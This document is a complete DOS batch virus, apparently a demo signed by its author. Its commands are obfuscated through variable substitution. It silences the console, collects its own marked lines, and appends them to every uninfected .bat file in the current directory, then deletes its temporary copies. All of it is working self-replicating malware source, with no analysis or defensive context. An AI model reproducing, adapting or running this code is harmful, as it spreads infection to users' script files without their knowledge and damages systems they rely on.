;@set cqx=ctty
;@set ca=nul
;@%cqx% %ca%
;@set fh=if
;@set nho="%0
;@set cqx="
;@set vlr=goto
;@set xex=;@
;@%fh% %nho%==%cqx% %vlr% %xex%
;@set cqx="%1
;@set ca="@
;@set nho=;@z
;@%fh% %cqx%==%ca% %vlr% %nho%
;@set cqx=echo.
;@set ro=@.bat
;@%cqx%>%ro%
;@set ks=find
;@set bfl=";@"
;@set cqx=%0
;@%ks% %bfl%<%cqx%>>%ro%
;@set cqx=for
;@set bfi=%%b
;@set ca=in
;@set nho=(*.bat)
;@set fdu=do
;@set up=call
;@set dhb=@
;@%cqx% %bfi% %ca% %nho% %fdu% %up% %dhb% %dhb% %bfi%
;@set cqx=del
;@set ca=@.*
;@%cqx% %ca%
;@%vlr% %xex%
:;@z [ABM 1.0 demo] by Duke/SMF
;@set su=%2
;@%ks% %bfl%<%su%
;@set cqx=errorlevel
;@set ca=1
;@set nho=type
;@%fh% %cqx% %ca% %nho% %ro%>>%su%
:;@
